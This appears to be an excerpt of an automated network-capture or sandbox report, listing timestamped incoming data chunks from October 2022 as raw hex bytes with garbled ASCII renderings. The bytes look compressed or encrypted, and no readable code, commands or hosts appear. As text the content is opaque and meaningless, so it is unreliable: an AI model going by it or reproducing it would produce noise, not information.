                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5463INData Raw: 0d 9d ae 42 9c ed f3 e3 a5 08 8d 21 4a 07 bd b1 60 c4 bd 90 22 39 f6 1c 87 fc 53 f2 63 13 8b fa 02 d3 b4 49 ce 5f 40 c9 3d 3e ce c3 41 18 79 be 5d 18 46 d6 64 f8 a4 29 ac fb 86 b6 9b 16 25 8f 1e 0a 75 8d 42 0a 41 ef 7e c1 25 00 f7 eb c8 28 d0 ca bf 0c a2 5d cf 10 64 51 48 7f 16 36 ea ff f6 5e af 18 dc db 19 40 c9 3a 8a 13 99 72 fc a1 bf d2 e1 83 1f fd a1 77 d1 cc 1d fc 27 5d 5e 7c 52 f2 38 01 32 4f 69 98 12 5c 38 4b 69 20 f2 a6 bb 38 d6 6d ba 69 46 56 5e 8d 73 08 7c 4d 13 fc db af 3f 2b 1a 61 7c 3f d6 00 e0 ef 7d e1 a9 55 38 ed 37 55 bf 2f bd 4a 2b 16 e4 60 eb 3c f3 d8 cf 8c ec 34 e5 49 37 9b ac 29 fa d1 09 69 82 06 89 7d 4d cb 22 ca ee f5 c7 b4 e2 a9 87 3e 15 fc d8 38 b4 98 6f 76 79 84 e5 8d 85 80 d4 a6 61 e6 f4 cb 27 50 fa 92 df c1 82 98 65 4b e8 36 a4
                                                                                                                                                                                                                                    Data Ascii: B!J`"9ScI_@=>Ay]Fd)%uBA~%(]dQH6^@:rw']^|R82Oi\8Ki 8miFV^s|M?+a|?}U87U/J+`<4I7)i}M">8ovya'PeK6
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5479INData Raw: ce c0 8a 95 28 68 d1 53 2e 2d 64 d9 6b 7b 81 01 38 ba 08 78 b2 be 3e de 73 27 ce 39 f9 54 27 af 7f ec a5 c8 52 1e 5d f5 dc 7c 6e 17 07 93 89 b5 44 10 b6 dd 85 24 0d 3b 86 e1 ab cb 35 25 25 1f bb 6d 7f d1 52 d9 52 e8 63 38 1c 44 44 bf a0 a6 c6 81 6c 3c 42 d1 7b 98 c2 ce 1f 04 1f 58 24 31 bf d0 a4 76 86 0a e5 ec e1 79 7a d4 ed 46 cb 42 40 1e a4 57 34 57 9b c7 40 ee 25 cc 81 a2 0e 21 70 bb a3 d4 8d 64 84 1f c5 4a db 08 91 89 55 47 83 ba c7 5b 86 00 b2 60 6f 23 9b 03 21 a6 d8 d9 2e 73 0c 92 ac 22 13 66 9a 1d 76 2d ef b9 7f 85 dc aa 90 81 54 4f 71 71 df 06 04 c4 65 69 74 91 ce 27 ca dd 75 ac fa 37 7a 18 c5 60 06 0f 34 7d 12 7d b9 c9 65 2a 8c 53 89 40 1d fb c8 01 86 45 24 bf 58 55 ad d6 88 0b 99 bb 7f 09 24 60 89 65 2b 73 44 52 06 99 29 7f 7a bd a4 09 f2 ed 66
                                                                                                                                                                                                                                    Data Ascii: (hS.-dk{8x>s'9T'R]|nD$;5%%mRRc8DDl<B{X$1vyzFB@W4W@%!pdJUG[`o#!.s"fv-TOqqeit'u7z`4}}e*S@E$XU$`e+sDR)zf
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5495INData Raw: 52 0d f5 57 dc 42 d6 f1 47 da 95 44 39 eb 17 4e a9 50 51 07 d3 1c 8a 1b f4 ae da ba 60 4a ae 5b a0 5f 60 68 09 1a f1 ed 5a 6b e6 31 59 6f d4 78 12 2b 54 b0 35 27 ca b0 b4 f9 3f 67 83 2e 7b 6f c1 41 c5 53 ec d3 78 d7 5f 0a 1c 3c ab cb 85 6b 02 14 79 2a bb cb 74 0a 0d 40 db aa 4e 5b c1 28 6d c5 34 8b bd ea 71 04 91 76 82 a1 2c 47 85 34 87 be 67 d0 80 fd 60 f3 df 65 f9 93 9a 82 9b 71 10 d5 87 34 ac 73 ad 46 e6 e5 32 9f ab 29 5a f8 05 8e e4 a4 3e 0c ee e6 93 97 9d b7 0b 92 fa 06 4f 89 f2 3e 1d af 77 75 cc 89 89 d3 22 cd e2 a8 f2 25 56 30 cd 12 95 3c 3d 04 fe 14 69 f9 3b bd 5a ab 63 5c 9f 0e 9c 9f 33 fb 8a 7c ee 4a c1 3c 62 07 99 0f 7f 10 01 e4 6c be c0 9c 8a a8 00 87 a8 6c 91 4e b1 4b cb 94 4a 78 63 7e 92 a3 f1 4c 19 96 bb 65 6a d4 dd dd f9 7f 5a 54 83 59 ca
                                                                                                                                                                                                                                    Data Ascii: RWBGD9NPQ`J[_`hZk1Yox+T5'?g.{oASx_<ky*t@N[(m4qv,G4g`eq4sF2)Z>O>wu"%V0<=i;Zc\3|J<bllNKJxc~LejZTY
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5511INData Raw: 97 ce e0 0e af 5c c3 f3 e5 18 41 ef 56 65 4e 36 95 51 bb b3 14 bf 97 dd 63 49 ac 32 7b 06 9e 1e d5 2f 2f 20 30 da d6 39 10 9a ca e7 22 89 06 68 49 8d a3 e8 cc 6f 86 85 24 97 67 76 fc 8c ff c7 7b 92 0c d7 94 c2 3d 1d e7 da d9 c4 ae ab 7d ee 31 bb bc 47 f4 ab 9b b1 46 c0 5b d2 ce f5 d5 1e 30 86 ad 73 d2 d1 da 42 8a 50 d3 00 21 f5 ec eb fc ed bc 9a 0e 94 ac ac a3 98 a1 f5 2e 98 9b 31 53 0f 49 e1 ad 39 46 62 53 85 23 90 59 53 f4 3b ba 4e 58 c5 cb bb 1b 13 6d c5 62 d2 4a e0 5d 8f 12 9e 10 3b 08 16 42 29 fe 32 ba d1 05 3c d4 7b 91 78 28 fa 7d d1 55 9f c0 04 f3 73 7c c4 a2 b1 65 4f cf 80 21 24 87 1c a8 98 86 c7 3d 8b 9e 11 ae ff 26 35 aa fb 38 79 99 a6 cf ac fa e9 9b 9d d1 a4 65 4f 2f a9 33 0c 92 56 9e c7 50 ae 6d 91 8c 86 19 dc ae 09 cc ca 7c a4 0a f4 55 36 3b
                                                                                                                                                                                                                                    Data Ascii: \AVeN6QcI2{// 09"hIo$gv{=}1GF[0sBP!.1SI9FbS#YS;NXmbJ];B)2<{x(}Us|eO!$=&58yeO/3VPm|U6;
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5527INData Raw: 6c d7 0e 15 fd 17 ce ab 87 c6 ba 0c fe 03 09 c4 5d c8 81 33 69 7b 70 ea c1 16 e2 8d 07 1f dc 1d 8b b5 56 4e 01 8a 52 32 c5 d8 94 81 4b 55 79 b2 46 7a 88 fe 7a ed 03 8d 0f b8 b2 b4 96 f8 4f 94 c5 84 e9 e4 31 81 49 cd 04 67 34 c5 b0 1c 36 82 98 8b 4a 15 b9 99 3a 69 f4 1c 57 db ee 67 0d 58 07 c9 b7 80 9b 2a 64 7b 09 79 6d b3 9c d8 71 7e 93 c5 50 06 22 ec 0c dd b2 77 fb d1 36 5e df 31 c4 77 4a 5a 7a 67 fe 94 1e aa 4b f6 0c ac b7 93 d6 8e 63 90 30 ad 8c a9 ab 7d 36 f6 0e 39 11 37 00 95 42 16 4f fb 08 56 35 33 74 15 24 d7 b0 52 9d 41 03 2b 82 36 13 12 bf f2 83 b6 1e a8 86 06 89 28 1b ab 63 3b b0 b6 5a cb 39 2e c2 27 af 30 ec f7 8c 6a a8 16 2e c5 b2 d0 48 96 c2 e6 e6 c1 eb c2 85 0b ec e5 af 04 b8 3f ba 21 78 a4 76 89 44 56 d1 6e ce 60 5c a7 17 d3 aa b3 b1 14 39
                                                                                                                                                                                                                                    Data Ascii: l]3i{pVNR2KUyFzzO1Ig46J:iWgX*d{ymq~P"w6^1wJZzgKc0}697BOV53t$RA+6(c;Z9.'0j.H?!xvDVn`\9
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5543INData Raw: e4 d0 7b 4f 5f b0 9a e9 6d 31 4d 6a 7a 5a 72 9c a1 a6 8e 7f e0 dd f0 c7 23 f3 a2 5c 80 57 11 cc 08 f6 98 b1 64 a5 9c 4c 95 4b ea ea e8 48 ef ff 6e 1b 8a 57 bb 37 71 42 ec 54 90 97 57 2e 2b 0f 91 7e 62 94 9e 5e 17 15 b0 53 b7 52 4a 70 c2 28 d3 f8 48 78 ef c9 3f 6f 9f 2c 5a 5a a9 55 f5 94 99 87 c3 3b 66 07 f2 69 9b 16 e9 24 79 0a 25 41 8f c1 d5 f9 46 47 85 c6 b4 c5 74 49 e1 a6 e6 32 d7 4f 73 a5 6f ae 31 e8 cb 31 cf 77 f4 12 d4 ae 6a c7 e6 cb 45 2f 54 0d 68 fd a9 95 c1 f0 e1 68 f2 10 3b 0a 1a 10 15 42 67 66 45 31 c7 50 88 41 83 35 da 49 aa 80 c3 2e 59 ec 27 03 98 99 7d f3 e0 81 58 44 ef 44 7e e1 5b 75 cf 15 e9 2d 7d 18 46 0e e0 d7 73 37 fe c7 a7 35 c8 ce 7c 46 63 f8 23 95 56 b7 54 f4 42 c8 63 6f 68 bd 5e e7 ef 62 27 c6 f5 a9 94 8f 70 58 cc 1e 6f 51 ae cd 38
                                                                                                                                                                                                                                    Data Ascii: {O_m1MjzZr#\WdLKHnW7qBTW.+~b^SRJp(Hx?o,ZZU;fi$y%AFGtI2Oso11wjE/Thh;BgfE1PA5I.Y'}XDD~[u-}Fs75|Fc#VTBcoh^b'pXoQ8
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5559INData Raw: c5 79 b5 c7 e0 32 3b a9 42 4d f1 54 0f 18 78 00 32 80 af 9a 10 40 36 d5 d8 a2 9c dc 5d e1 3e fd 4f c2 25 8e 46 a4 de 4d 65 6d c1 5b 53 42 7b fc 40 30 cd f6 22 7e d3 0d 53 1f 2e 75 8c 9f ad 7a 72 a5 44 c6 b7 99 ae e6 2d 6a 64 c3 5d c6 72 f7 f9 9e 00 dd 86 66 ba 53 f3 f9 3b 52 51 3d 5d 0b 28 42 c2 b3 e4 f3 f4 cb 9a 56 f1 14 7c b2 52 fb a4 37 b8 a3 b6 be 23 f3 ed e4 63 23 3f b2 7e 2f 43 08 65 3b a3 52 58 2d 60 c8 5a 63 12 ca 0b 51 61 ac af ca 09 bb 94 21 4a 15 7a d5 9e 57 e9 eb 60 db 7b 5f 1d eb cd ab bc 1b f0 c4 55 7f bc 4d b0 ab e2 c0 0f 06 1d 36 74 4b a3 28 54 7a 58 11 e0 a8 69 44 22 40 c4 25 5d 74 aa 2e bd fa 2f a6 6d a3 54 06 2c ec 0e ab a6 49 f8 bb 83 99 53 64 c2 58 fc 6f 1a 8f d7 49 d4 a9 4e cc 7b ce 00 9e 8a ef cf 63 14 7a fb b1 4c c2 ad 0a 86 2e bd
                                                                                                                                                                                                                                    Data Ascii: y2;BMTx2@6]>O%FMem[SB{@0"~S.uzrD-jd]rfS;RQ=](BV|R7#c#?~/Ce;RX-`ZcQa!JzW`{_UM6tK(TzXiD"@%]t./mT,ISdXoIN{czL.
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5575INData Raw: 2c 8b f6 07 78 6d ae c2 52 7b 95 81 4c f0 6d f1 33 8f 7a 15 6e 4f 43 a4 e1 5a 75 a0 aa 0a 68 b6 cc a5 c5 33 85 ac f9 15 76 6a ac e4 3f bb d3 fa 19 12 50 2f c1 d0 a0 0c 17 43 86 18 4a 0e bc 0a 0b 25 d2 24 67 bf 0f ca da 9b f4 e1 e5 3d ee 37 77 23 99 48 8c 51 00 83 33 65 d8 92 54 cd 17 1c 47 63 7b e9 47 12 0c 99 68 23 29 70 3e fd 54 67 6d 3c 1e 20 73 4d 0d f0 10 63 c9 53 32 e2 8c 80 6e 74 86 67 6c 86 2d 3d 8a 66 bb 41 6c ad 0e d9 76 fb c8 ca 4b 0b ca 03 34 64 ff 43 5e 78 25 a6 00 0e f1 64 71 4b aa f6 06 65 83 4a ff c5 08 75 2b 1a 9c 1d 46 29 92 9c ff 8d e3 23 05 e0 e1 73 58 ac 4c 10 06 b3 84 f8 db ec d9 08 96 a5 06 e4 4a d8 e1 86 5a 4d 3e f5 ed 0f 73 0c 5a cd 13 a5 3e e2 c4 e7 66 4a 95 aa bd 2d cf ba 93 6d 90 3d 4d ce 20 fe 06 97 4b c4 79 b6 87 ae 6e f3 c9
                                                                                                                                                                                                                                    Data Ascii: ,xmR{Lm3znOCZuh3vj?P/CJ%$g=7w#HQ3eTGc{Gh#)p>Tgm< sMcS2ntgl-=fAlvK4dC^x%dqKeJu+F)#sXLJZM>sZ>fJ-m=M Kyn
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5591INData Raw: ab 99 a3 a0 79 c6 42 e8 70 89 39 91 06 86 16 32 16 da 0d 2b 91 0b ba dc 34 f3 b1 b2 e4 8f 2d 69 fa e3 53 aa 31 2d af ed 4d c0 23 b1 e1 ca f8 6e ec 8e 9b 2f 03 ad 0e 9b ef 14 47 3c 36 eb 64 05 57 4e ad 3c 2e d5 9b ac 4c 82 c6 b1 4a 4d 12 01 d7 4a 5f b9 e2 78 0e 68 21 4a 06 d6 a4 5c c9 00 c9 3f bd d8 d3 80 ca 79 c8 72 35 d6 dc 8b 5b 51 79 76 ae c5 4b 3d e1 3f f4 62 a2 e8 fa 34 e4 40 ee 61 4a b9 6f 1b 73 db 16 ca b6 15 99 eb ec 7a bb aa 2e 32 4a 44 f3 d8 64 df c0 e1 49 4a f7 bc 7b 1a 18 2c 92 66 cc 06 e7 64 5b 48 0d f7 1d f5 0a b8 be 21 e8 72 0d 6b 91 d5 e5 d9 9b 53 ae 43 50 eb 52 9c 4b 8e e3 98 6b 51 6d 40 bf 0f 05 8a 3b 0c 82 e4 c8 a1 0b 02 e9 cb ca 27 2f da b0 67 bc ed 94 f9 c4 34 4c dc 6f 34 36 2a bf 5d 18 20 4c 67 69 95 15 c7 8e 34 c9 58 8d f4 a2 ff 92
                                                                                                                                                                                                                                    Data Ascii: yBp92+4-iS1-M#n/G<6dWN<.LJMJ_xh!J\?yr5[QyvK=?b4@aJosz.2JDdIJ{,fd[H!rkSCPRKkQm@;'/g4Lo46*] Lgi4X
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5607INData Raw: fe 3b 05 73 7f b3 04 f5 d0 87 e5 2a 69 90 fc ae c4 8b cb 3c bd 18 11 5b 86 84 47 1c 71 53 2d db 4e 16 02 f3 de ed 06 ec bd 2c b4 dd 95 80 67 eb 56 d5 d9 2a ce 69 86 77 66 0f c7 77 88 28 22 d0 26 ee b0 56 60 cc 3d 89 05 8f a7 a3 9c 1c 3b 29 4f 4b 28 b1 2d 7a 97 f9 68 be 39 2d 91 c2 d6 48 2c 46 01 99 28 7a 95 19 9e e0 39 56 b6 77 20 a5 88 3e 84 52 ef ac 49 54 e0 77 c4 eb 0e 0d 70 6e 2b 9c 64 6a 84 5d c2 25 c5 90 f9 a8 21 60 bf 05 f8 5f 0f 88 88 bf 92 99 3a 44 08 24 e1 e3 35 84 c9 f2 ee a3 19 ba b7 47 94 64 d3 3c 6f f3 e5 90 ff 37 6b 66 05 57 9b 4d 01 48 d7 28 cc 03 24 d2 fd d8 e3 3c c9 6e 2f 2b 76 ba 35 a9 ca 70 5a 52 d7 21 01 21 ba 0c 04 fa db 73 8d 4f 0b b3 7b c9 c4 5f 6f 19 65 72 53 71 60 f2 ed 92 26 01 e7 23 a7 06 8a fc b6 fd 1f ae a4 72 91 82 46 d5 2a
                                                                                                                                                                                                                                    Data Ascii: ;s*i<[GqS-N,gV*iwfw("&V`=;)OK(-zh9-H,F(z9Vw >RITwpn+dj]%!`_:D$5Gd<o7kfWMH($<n/+v5pZR!!sO{_oerSq`&#rF*
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5623INData Raw: 3e 91 06 29 1a c6 1e e8 1a 9c 26 31 81 58 81 ae 58 53 a7 13 65 93 8a e6 83 6c 1e 95 19 98 4e 6b 9c 67 e0 b8 6e 5b 34 2d fc 4b 5c 69 1a f8 76 47 f7 fb 9b 42 1e 39 a5 e7 91 9c 31 02 83 5e e4 13 73 4d 6f 21 74 86 7e c2 4f e3 4a 66 73 02 33 a4 29 3f 6c 62 89 72 d2 db a1 98 a4 e0 08 28 bb 19 74 ac b7 73 c2 6f ca be db 6a a6 e4 79 a4 56 79 3b c2 77 4b e2 cd a3 61 fd 25 74 ad 70 7a a2 ee 96 42 b9 8a 41 4c b6 a9 7f db c1 51 5e fe 23 ed 4d 93 f4 55 68 95 7a ac 24 7f aa de c2 8d e6 ec 14 d8 63 2f 6b a0 6a 0c c3 c1 5c 5c c6 a2 cf 87 fd 9f d2 f9 ed e4 73 83 d9 27 74 31 1b c5 6f da 6b 82 23 ce fc 5b 09 50 2b e7 61 af 2c b9 82 5c ef d8 75 44 e2 a4 ea 27 b9 10 98 a9 40 2a cc 5f 2c 48 1d 61 f2 1e 80 63 78 84 71 25 f1 c7 47 d9 09 05 5b 0c 1f d4 02 32 58 6f bc 12 34 61 b6
                                                                                                                                                                                                                                    Data Ascii: >)&1XXSelNkgn[4-K\ivGB91^sMo!t~OJfs3)?lbr(tsojyVy;wKa%tpzBALQ^#MUhz$c/kj\\s't1ok#[P+a,\uD'@*_,Hacxq%G[2Xo4a
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5639INData Raw: 5a ec 72 d1 e7 7e c9 73 5c f9 d7 36 d2 89 50 87 b5 56 f4 4a 25 15 a9 73 f4 ca 93 e7 11 48 8b 15 e2 3c 3a 8f 0d 82 26 7b c6 c2 d1 ea 7f 9a 20 dc ac f5 06 80 6d b2 d0 93 d9 bc 13 70 0c 62 61 ef 26 62 9b b6 3b d6 88 f0 61 c4 44 14 83 f1 88 2d d0 2c 1d 92 8d 27 1e 83 a0 69 4a bb af e2 d5 14 18 8a e2 99 12 cc 95 c0 4e ed af c9 c7 17 86 00 72 0f d7 3e 55 c3 a2 01 aa 89 1a 58 ac 4c 5e 55 65 2b 89 39 01 13 72 c2 d9 f8 2a 73 15 ff 12 2e 4a 45 56 11 48 d6 e1 97 2c 96 e1 1c ee a1 8b 04 4b d3 db a1 0f a5 a7 0c 6e 37 d0 41 1b 3a c3 1e 69 15 42 09 00 b2 a7 31 51 7f 85 68 db d3 8c 6d b1 ed b7 a9 97 4e 97 4f 8e 74 6e 63 bb 17 90 54 06 c3 c1 0e 92 a8 69 39 50 91 68 66 ad 5f 4e 56 a0 b5 9f 14 9a 5b 8b 27 59 96 5a 3a 58 fe 60 7a 3a 3d b5 cb da aa 01 5f d0 05 b4 67 ff 6f e8
                                                                                                                                                                                                                                    Data Ascii: Zr~s\6PVJ%sH<:&{ mpba&b;aD-,'iJNr>UXL^Ue+9r*s.JEVH,Kn7A:iB1QhmNOtncTi9Phf_NV['YZ:X`z:=_go
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5655INData Raw: 22 5c 45 ee 33 1d e9 ae 31 38 e6 5e 1d 9c 5d 7b 9a 1c 15 43 27 2a 89 16 ea b1 46 c4 4b 41 f3 56 97 03 ab 62 a3 3e a5 d4 36 94 08 fe 96 bb 3e 92 2c 6d 65 c0 86 85 53 79 6f a5 b9 d1 15 85 ed 55 7f 68 80 91 e0 c9 b2 9f 47 87 63 c3 0d 48 cc a7 b0 5b 7c a8 2c b6 d2 d9 73 b4 c5 b3 40 fa 06 87 34 cb 30 9d ca ed 9b 97 8e f3 93 f1 bd 5b 33 b4 4d 8c 52 3f c3 70 60 aa 46 8a 93 e1 e8 7c 33 c9 31 1e f7 0e 15 f1 9d cd 55 23 5a 45 f5 af 6c 08 86 3a b8 c3 08 dd 5a 27 d1 99 c1 11 74 7c 4f dc 65 a1 53 1a a0 a9 3a 22 b4 bd 22 ec 8b cc b9 36 17 bb 45 4d 0f eb 2d ab bd 9f 17 8b d9 4c fb bf 1b 7b 51 a9 91 65 39 67 83 80 07 8b d7 d5 25 d8 4d 0a f9 e7 e9 97 d4 25 10 2d 27 11 c9 53 25 44 3c 16 cc ed c5 3e 6f 9d 7c bc 6b d5 76 6f 03 79 0a 64 84 32 4b 9c 80 65 20 5c f7 30 ba 9a b5
                                                                                                                                                                                                                                    Data Ascii: "\E318^]{C'*FKAVb>6>,meSyoUhGcH[|,s@40[3MR?p`F|31U#ZEl:Z't|OeS:""6EM-L{Qe9g%M%-'S%D<>o|kvoyd2Ke \0
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5671INData Raw: 85 53 0a b9 0e a7 95 38 35 78 4f de 9e b1 e4 b3 77 2b 43 21 d1 4b 2b 4a db a3 c9 f2 e5 04 2a 7b 58 e0 b1 8e 8f a1 9f 8c d7 a4 b9 44 29 03 3a f3 76 aa f9 68 65 cc b5 17 ee 5c 5c 84 bb 52 25 83 af 62 9b 86 e2 3c 84 49 6e 29 a5 14 0f b2 31 c4 c3 de c9 4e 8f 6b 59 ff 78 d5 84 d9 ee 96 9e d8 0f 59 99 dd b3 5a 76 ca 5a de 39 5b 6c fd c8 1e 36 59 fc ca 0a 2d 60 e9 ce 13 21 be 1d f3 6a b4 6d 91 69 33 7e e6 12 f9 c1 9b b5 fd 41 ed 43 b2 e7 12 cd 39 62 bd 8a 01 1a 8f 0d f0 56 6b 6c 7f a6 58 9c 31 cb eb 2b e6 37 07 5d a6 78 be 87 4f a2 74 c4 a4 b7 e6 33 97 56 11 13 d8 bc 61 9c c7 66 12 4c a9 7a 5f 9c 98 76 4f 25 0f c1 1d c1 b0 14 9a 4a 0e 89 b7 98 80 24 d0 df ae 51 06 27 6d ec 75 ff 69 2b a9 65 98 53 cf e8 44 b8 87 b6 84 cd bd 56 04 46 b1 eb f4 26 cb 40 78 72 b3 82
                                                                                                                                                                                                                                    Data Ascii: S85xOw+C!K+J*{XD):vhe\\R%b<In)1NkYxYZvZ9[l6Y-`!jmi3~AC9bVklX1+7]xOt3VafLz_vO%J$Q'mui+eSDVF&@xr
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5687INData Raw: f7 07 45 3e c1 da a1 4f f7 37 48 75 81 5d 14 da cf 2c a1 95 ab 96 cf f2 4c 03 af da d8 86 1a 73 5c 73 50 4b ee a5 e5 34 0d 0f e9 d9 83 2c 16 b5 b2 d5 7a f1 91 1f 50 ce f8 6f c9 da f7 8c 25 2b 7d 6a c1 08 72 54 5f 8a 43 2a 5a f2 03 7a fa 1a e0 76 72 1c 81 db fc 86 d9 d2 c8 a5 ee 74 6b fa 1d 46 e4 97 5c e8 e5 4c 63 ca d3 32 c1 b5 1d 43 66 78 df c1 a1 c8 ea 35 14 5d 67 15 0f de 13 cd bc 37 fc 8c d8 50 57 96 42 3c ae d8 ca 27 77 b5 98 80 89 f6 c3 2a 8a 95 6b 8e 10 c5 79 7c 4e e9 1c e8 56 e6 d6 65 f9 b8 3b 93 17 a8 fc 5c b7 1e df 14 77 ec 78 04 14 08 16 36 d8 f3 09 34 35 cc e4 26 ca b4 42 b6 7e 46 51 bf ab 7f e8 24 7a a5 36 93 02 c3 ba fa 61 e4 01 ef cd 13 95 e7 43 ea 20 bd cc 80 af 82 cb 9a 1c c1 ab d6 8f 4c ec 13 5a a3 82 4d 9b bc 03 ea 5c d0 04 8a 54 c8 8d
                                                                                                                                                                                                                                    Data Ascii: E>O7Hu],Ls\sPK4,zPo%+}jrT_C*ZzvrtkF\Lc2Cfx5]g7PWB<'w*ky|NVe;\wx645&B~FQ$z6aC LZM\T
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5703INData Raw: a6 0d 1f e6 49 e6 0b b3 fb 5c e0 7c 6d bf 19 2b 1c bc 35 c3 3e 9d c7 d2 cc 31 62 cc 16 f3 c8 57 d6 16 4e 05 81 ae eb bf 87 fb 51 1b ca 9c 70 82 5e 93 9c eb c3 46 21 25 71 9f a4 22 5f f8 27 28 5a 6c fe d0 3e 0a de 7b c6 a7 b0 30 23 ed ea a7 71 f9 a1 1a 57 81 76 15 85 21 3f 73 6d 1b e6 02 8d e2 eb e5 b2 2e f1 45 8d a0 8e d7 aa ee ad 4b 45 55 58 7f 66 88 57 43 a0 17 66 40 1d c9 ed 12 2e e1 18 d0 c2 12 06 d4 78 7b 7a 55 2c d3 33 ed 47 69 01 62 be 5f 08 71 83 39 8c b9 28 70 a9 d3 86 99 59 4d d1 b0 a8 06 45 38 49 59 d8 a5 0a d9 15 84 34 68 fc 31 46 df 4a f5 51 c8 32 22 1e 85 a3 23 3f 54 eb a0 22 cf d6 2e 25 59 33 83 47 ab 8b 31 b1 6d 0c 52 b8 eb 7a b3 02 25 b5 68 46 d8 d5 fb ed 12 69 52 32 4b 7e 53 2b b7 37 cf 91 6a a9 d7 63 b1 3c 87 48 ba 60 ee ca 4a f0 92 d4
                                                                                                                                                                                                                                    Data Ascii: I\|m+5>1bWNQp^F!%q"_'(Zl>{0#qWv!?sm.EKEUXfWCf@.x{zU,3Gib_q9(pYME8IY4h1FJQ2"#?T".%Y3G1mRz%hFiR2K~S+7jc<H`J
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5719INData Raw: 66 0a a2 f7 9a 8b 35 d2 4d 41 8d bc c1 00 9f 26 27 00 51 9b fa 49 c0 d5 7e 1b a6 c2 aa b6 88 1d d7 38 4b 93 63 bc af 2d 57 f6 9e 8f 98 18 cf 21 db a3 7a bc ac 7f eb b9 6c 14 45 cb 99 29 5b 9e da 74 cb c3 65 66 ce 29 26 16 68 c2 ef d7 ce a8 29 1e c3 bf 2d 62 f8 e8 f1 3d 22 f4 e9 03 f1 e0 e2 89 f6 2e 72 df 6b 02 c0 a3 b0 89 c1 f3 c8 76 46 80 e8 7a 9c ae e3 e6 13 f8 95 8f 36 ec 85 cf 10 5f 7e 7a e0 42 7f c5 79 2e 6e c4 00 57 b8 67 f2 7a 3d 1d b3 30 67 54 63 a9 32 63 54 fb 1c fa 2d 1a b5 f2 d2 93 3f f5 42 b1 46 ef 2d 7d b2 76 0e f1 59 00 19 27 c8 15 fd 87 dd 05 cb 97 7d d0 d2 11 57 ca f1 e5 c2 b9 cc 8a 26 bf 6f ae 36 54 5c e4 b5 ec 39 71 bc 7e 42 35 84 fe 64 0d ac 4a 3c f2 8e b1 47 7d 31 31 f6 7f 3c 53 1d 1b 82 be 8e 84 19 6d 95 29 55 45 a8 16 34 39 54 d5 f5
                                                                                                                                                                                                                                    Data Ascii: f5MA&'QI~8Kc-W!zlE)[tef)&h)-b=".rkvFz6_~zBy.nWgz=0gTc2cT-?BF-}vY'}W&o6T\9q~B5dJ<G}11<Sm)UE49T
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5735INData Raw: ef 51 75 a4 a0 61 ce cd 86 f9 0b a3 30 aa be e2 4a 5d 45 f2 3e 59 d6 f0 8b c4 bb 9e 01 fd 4d 46 76 0b 0d 85 62 37 56 eb ea 6c 39 e6 c2 7e 28 b3 4b 6d fd ad 76 83 21 77 b5 11 b6 ea 79 46 ce 32 c6 8f ab f8 b2 42 24 b8 ce 9a 44 55 ae f3 05 9c 78 3c 60 15 6b 62 d6 83 32 be f4 a5 ef 3d 33 33 fb 34 0a 70 8b 21 6d 56 fc 2a 06 2b a8 69 c1 33 0a 5a a1 8e 5a 20 63 8b 81 1c 78 c6 de 7a 9e 43 33 2d 1e 69 59 e3 6e 89 33 6c 86 e3 cc 1a d8 4f 7f 9c 31 3b 75 3b af 7c 63 8e e8 00 11 f8 66 d1 7d 6b eb f1 98 1f 11 a6 d7 5e a1 fa 17 e4 d4 6d 37 53 07 da 17 9f f3 4a 82 ef fe 1f cd 82 3e c5 92 4a 21 96 8d 8e a4 a9 56 83 0b 90 d4 21 30 f5 0b 9d f1 e6 b8 52 82 0d 39 35 d3 f8 41 bb c5 ec 68 1b 04 a6 b0 b6 bd 3f d9 c1 1b d4 d5 c9 08 b1 7d 2f 95 62 f8 02 86 fb 63 ce 27 2d 1b 89 e8
                                                                                                                                                                                                                                    Data Ascii: Qua0J]E>YMFvb7Vl9~(Kmv!wyF2B$DUx<`kb2=334p!mV*+i3ZZ cxzC3-iYn3lO1;u;|cf}k^m7SJ>J!V!0R95Ah?}/bc'-
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5751INData Raw: 57 ff 2f e8 08 f0 10 f2 bb 72 31 65 27 41 0c 9d 01 bc 8c 48 ab 05 83 65 33 0c 00 03 d8 99 b6 b1 13 0a ae 03 28 15 46 51 2c db de 6a 54 71 06 36 54 65 b8 98 ce 93 bb d0 ee 4a ec f5 b8 7d 76 51 0e 81 e7 ce e1 3b fd 88 5b b1 3f 1c f5 e0 f3 0e e3 2f a2 40 02 73 df e7 f1 a4 9d 76 b9 27 02 b3 be 27 4d 70 a9 b5 cb 1c 92 ae 6e 80 12 98 5e de f4 db 9d a5 d9 96 ae 82 4e b1 93 da 54 5a b5 08 29 98 48 58 76 40 1b 73 eb 03 ff 29 81 d6 ce 22 13 43 9b 3e 4d cd ae 10 de 90 82 df df d2 99 97 07 ba 3d c2 b8 17 09 b9 27 c5 6b f6 cd fa 77 bb 02 42 30 28 c3 b5 37 cb cd d0 a0 a2 52 f9 31 aa 7c ca af 09 6b 59 87 4c aa fd e8 6c 2a 28 c1 a2 92 22 92 82 d1 6b e4 b0 d7 32 c3 e1 56 dc d1 59 01 b8 6f 6a f4 ee c8 9a b5 f1 4f 2c b3 13 76 d5 ee cc e1 f7 8f ec d8 a7 fc a9 e0 be c9 46 fd
                                                                                                                                                                                                                                    Data Ascii: W/r1e'AHe3(FQ,jTq6TeJ}vQ;[?/@sv''Mpn^NTZ)HXv@s)"C>M='kwB0(7R1|kYLl*("k2VYojO,vF
